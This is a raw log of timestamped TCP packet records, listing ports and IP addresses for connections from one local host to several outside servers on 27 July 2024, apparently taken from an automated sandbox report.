Jul 27, 2024 08:54:42.886857986 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:42.890619040 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:42.890624046 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:42.891020060 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:42.978291035 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:42.990752935 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:42.990767956 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:42.990983963 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.379257917 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.379492998 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.379545927 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.393893957 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.393903971 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.393914938 CEST	50736	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.393918991 CEST	443	50736	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.415397882 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.415477991 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.415713072 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.426318884 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.426379919 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.641923904 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:43.641998053 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:43.642260075 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:43.656892061 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:43.656958103 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:43.656992912 CEST	50735	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:43.657008886 CEST	443	50735	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:43.759995937 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:43.760092974 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:43.760236025 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:43.760701895 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:43.760740995 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:43.905128002 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.905246019 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.906642914 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.906694889 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.907634974 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:43.908960104 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.909009933 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:43.909147978 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.441214085 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:44.441411018 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:44.443783998 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:44.443814993 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:44.443866014 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:44.443877935 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:44.444155931 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:44.444308043 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:44.444338083 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:44.585266113 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.585417032 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.585496902 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.585553885 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.585583925 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.585716009 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.585762978 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.585774899 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.585822105 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.585927010 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.586050987 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.586092949 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.586105108 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.590445995 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.590594053 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.590648890 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.590662003 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.590928078 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.673376083 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.673656940 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.673733950 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.679349899 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.679384947 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:44.679414034 CEST	50737	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:44.679428101 CEST	443	50737	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:45.158087015 CEST	50739	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:54:45.163363934 CEST	4449	50739	94.156.79.190	192.168.2.4
Jul 27, 2024 08:54:45.163512945 CEST	50739	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:54:45.187074900 CEST	50739	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:54:45.193833113 CEST	4449	50739	94.156.79.190	192.168.2.4
Jul 27, 2024 08:54:45.241610050 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:45.241771936 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:45.244034052 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:45.258853912 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:45.258908033 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:45.258938074 CEST	50738	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:45.258955956 CEST	443	50738	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:45.388463974 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:45.388545990 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:45.388670921 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:45.393543005 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:45.393616915 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:45.992773056 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:45.992970943 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:45.995086908 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:45.995115995 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:45.995174885 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:45.995186090 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:45.996094942 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:45.996263981 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:46.036540985 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:46.591794014 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:46.591819048 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:46.591909885 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:46.592175961 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:46.592200994 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:47.585761070 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:47.585936069 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:47.586018085 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:47.600553036 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:47.600553989 CEST	50740	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:47.600615978 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:47.600651026 CEST	443	50740	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:47.713366985 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:47.713449001 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:47.713541031 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:47.713934898 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:47.713968039 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:48.072137117 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.072204113 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.079090118 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.079096079 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.079412937 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.080499887 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.080641031 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.080672979 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.080773115 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.080779076 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.367466927 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:48.367712975 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:48.369996071 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:48.370023966 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:48.370076895 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:48.370089054 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:48.370672941 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:48.370846033 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:48.412544966 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:48.601615906 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.601841927 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.601906061 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.614609957 CEST	50741	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.614628077 CEST	443	50741	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.969181061 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.969260931 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:48.969352961 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.973082066 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:48.973156929 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:49.385425091 CEST	80	50714	109.172.114.212	192.168.2.4
Jul 27, 2024 08:54:49.385504961 CEST	50714	80	192.168.2.4	109.172.114.212
Jul 27, 2024 08:54:49.385591030 CEST	50714	80	192.168.2.4	109.172.114.212
Jul 27, 2024 08:54:49.390470028 CEST	80	50714	109.172.114.212	192.168.2.4
Jul 27, 2024 08:54:49.395219088 CEST	50744	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:49.404704094 CEST	80	50744	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:49.404798031 CEST	50744	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:49.404920101 CEST	50744	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:49.404946089 CEST	50744	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:49.410188913 CEST	80	50744	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:49.412638903 CEST	80	50744	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:49.443999052 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:49.444089890 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:49.445158005 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:49.445185900 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:49.445597887 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:49.451493025 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:49.452163935 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:49.452219963 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:49.755743027 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:49.755795002 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:49.755916119 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:49.755986929 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:49.756046057 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:49.756122112 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:49.757329941 CEST	50743	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:49.757364035 CEST	443	50743	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:49.771117926 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:49.771119118 CEST	50742	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:49.771181107 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:49.771215916 CEST	443	50742	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:49.885379076 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:49.885457039 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:49.885541916 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:49.885936975 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:49.885970116 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:50.312417030 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:50.312443018 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:50.312513113 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:50.313134909 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:50.313146114 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:50.565310001 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:50.565427065 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:50.571111917 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:50.571163893 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:50.571230888 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:50.571244001 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:50.572221041 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:50.572938919 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:50.572973013 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:50.578445911 CEST	80	50744	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:50.578593016 CEST	80	50744	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:50.578668118 CEST	50744	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:50.578751087 CEST	50744	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:50.583606958 CEST	80	50744	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:50.801722050 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:50.801786900 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:50.806205988 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:50.806214094 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:50.806600094 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:50.811887980 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:50.811887980 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:50.811944008 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:50.812117100 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:50.812135935 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:51.413820028 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:51.414079905 CEST	443	50746	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:51.414089918 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:51.414130926 CEST	50746	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:51.415779114 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:51.415966034 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:51.416052103 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:51.431215048 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:51.431261063 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:51.431293011 CEST	50745	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:51.431308985 CEST	443	50745	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:51.541659117 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:51.541739941 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:51.541836977 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:51.545891047 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:51.545923948 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:52.150425911 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:52.150618076 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:52.152921915 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:52.152950048 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:52.153017044 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:52.153028011 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:52.153305054 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:52.153439999 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:52.196537018 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:53.528424978 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:53.528645039 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:53.531588078 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:53.547091007 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:53.547091007 CEST	50747	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:53.547153950 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:53.547188044 CEST	443	50747	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:53.655642986 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:53.655724049 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:53.655930996 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:53.656320095 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:53.656352043 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:54.279864073 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:54.280353069 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:54.282785892 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:54.282835960 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:54.287492037 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:54.287564039 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:54.287806034 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:54.297465086 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:54.344547033 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:55.078839064 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.078921080 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:55.082768917 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.084469080 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.084572077 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:55.550852060 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:55.553884983 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.555408955 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.555434942 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:55.555922031 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:55.559195042 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.559257030 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.559400082 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:55.659928083 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:55.660136938 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:55.660511971 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:55.675043106 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:55.675043106 CEST	50748	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:55.675106049 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:55.675143003 CEST	443	50748	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:55.782989025 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:55.783077002 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:55.783255100 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:55.783649921 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:55.783678055 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:55.931669950 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:55.931869984 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:55.935866117 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.936616898 CEST	50749	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:54:55.936677933 CEST	443	50749	172.67.213.85	192.168.2.4
Jul 27, 2024 08:54:56.449561119 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:56.454390049 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:56.456705093 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:56.456757069 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:56.457335949 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:56.457348108 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:56.457601070 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:56.458822966 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:56.458851099 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:57.307048082 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:57.307226896 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:57.312545061 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:57.313950062 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:57.408981085 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:57.409070969 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:57.409109116 CEST	50750	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:57.409126997 CEST	443	50750	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:57.516087055 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:57.516110897 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:57.516160011 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:57.516618967 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:57.516630888 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:58.149219990 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:58.149328947 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:58.151746035 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:58.151753902 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:58.153879881 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:58.153883934 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:58.154037952 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:58.155334949 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:58.200573921 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:59.475945950 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:59.476111889 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:59.480583906 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:59.509208918 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:59.542604923 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:59.542604923 CEST	50751	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:59.542625904 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:59.542634964 CEST	443	50751	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:59.650971889 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:59.651017904 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:54:59.651092052 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:59.651511908 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:54:59.651529074 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:00.260994911 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:00.272576094 CEST	443	50752	107.173.160.139	192.168.2.4
